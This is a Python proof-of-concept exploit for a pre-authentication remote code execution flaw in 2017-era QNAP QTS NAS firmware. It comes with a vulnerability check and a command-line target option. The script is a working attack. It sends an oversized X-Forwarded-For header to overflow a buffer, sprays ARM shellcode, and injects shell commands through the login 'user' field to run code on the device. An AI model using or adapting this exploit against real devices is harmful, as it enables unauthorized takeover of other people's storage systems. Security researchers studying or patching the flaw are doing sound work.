Pre-auth Remote Code Execution exploit for QNAP QTS

# !/usr/bin/env python # -*- coding: iso-8859-15 -*- # # Pre-auth Remote Code Execution exploit for QNAP QTS # 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 #(Beta 2) build 2017111 # # Just a quick dirty RCE PoC to make your QNAP sing "XMAS" in morse. # # Author: Andrea Palazzo (@cogitoergor00t) # E-mail: not-interested-in-chinese-spammers@seriously-dont-crawler-this.lol # Web: https://truel.it # Lab: https://lab.truel.it # # While collecting material for writing-up CVE-2017-17033 I noticed this was fixed too, so it's probably one of CVE-2017-17027 | CVE-2017-17028 | CVE-2017-17029 | CVE-2017-17030 | CVE-2017-17031 | CVE-2017-17032. # More info: https://www.qnap.com/en/security-advisory/nas-201712-15 # # This version has been developed against model TS-212P running QTS 4.3.3.0299, but could easily adjusted for <= 4.3.3.0378 (you'll find a little present in the comments) # # -------------- import sys, argparse from non.ha import anza try: import requests requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) except ImportError: print "Do you even web bro?" sys.exit(0) exploit_data = { "target_endpoint": "/cgi-bin/filemanager/wfm2Login.cgi", "payload": "pic_raw 81;pic_raw 80;pic_raw 80;pic_raw 81;sleep 1;pic_raw 81;pic_raw 81;sleep 1;pic_raw 80;pic_raw 81;sleep 1;pic_raw 80;pic_raw 80;pic_raw 80;#", "bof": "A"*92+"\xff\x60\x66\xff"+"\x90\x60\xff", #PADDING+SP+PC "shellcode": "\x2d\xd4\xa0\xe1" + #mov sp, sp, lsr #8 #old popen @ 22c9c #07/07 @22e24 #28/07 @230dc #05/09 @21e90 "\x86\x3b\xa0\xe3" + #mov r3, 0x21800 "\x69\x3e\x83\xe2" + #add r3, 0x690 "\x13\xff\x2f\xe1" #bx r3 } def request(target, data, headers): url = target + exploit_data['target_endpoint'] return requests.post(url, headers = headers, data = data, verify = False) def vulnerable(target): print ">> Checking if likely to be vulnerable" headers = { 'User-Agent': 'Vuln tester', 'X-Forwarded-For': "A" * 200 } try: r = request(target, "user=admin", headers) except: print "Something wrong: {}".format(sys.exc_info()[0]) sys.exit() return (r.status_code == 500) def spray(n): spray = "" for i in range(n): spray += '{}={}&'.format(exploit_data["shellcode"]*3+"\x08\x80\xa0\xe1", exploit_data["shellcode"]*3+"\x08\x80\xa0\xe1") return spray[:-1] def exploit(target): print "Let's " + exploit_data['payload'] + "\n! COULD TAKE A WHILE !" if requests.get(target + "/cgi-bin/pwn").status_code == 200: print "... but first you need to clean up your mess, don't you?" sys.exit() headers = { 'W00T': exploit_data['payload'], 'X-Forwarded-For': exploit_data["bof"] #There were others, I'm sure you can figure'em out yourself if you need } data = spray(31337) + "&user=touch /home/httpd/cgi-bin/pwn; eval $HTTP_W00T;" while True: #print '.' try: request(target, data, headers) if requests.get(target + "/cgi-bin/pwn").status_code == 200: print ">> w00t :)" break except: print "Something wrong: {}".format(sys.exc_info()[0]) sys.exit() if __name__ == "__main__": print "" parser = argparse.ArgumentParser(description = 'Pre-auth Remote Code Execution exploit for QNAP QTS <= 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116') parser.add_argument('-t', '--target', dest = 'http(s)://uri[:port]', required = True) parser.add_argument('-c', '--check', help = 'No exploitation will be performed.', action = 'store_true') args = parser.parse_args() target = vars(args)['http(s)://uri[:port]'] print "\n------------------------------------------\n" + \ "Pre-auth Remote Code Execution exploit for \n" + \ "QNAP QTS <=\t4.2.6 build 20171026\n\t\t4.3.3.0378 build 20171117\n\t\t4.3.4.0387 build 20171116\n\t\t(Beta 2)" + \ "\n------------------------------------------\n" + \ "@cogitoergor00t\t\t https://truel.it" + \ "\n------------------------------------------\n" \ print ">> Targeting " + target if not vulnerable(target): print ">< Nothing to do here :(" sys.exit(0) print ">> Probably vulnerable" if (args.check): print ">> See you" else: print ">> Gonna make this baby sing\n" exploit(target)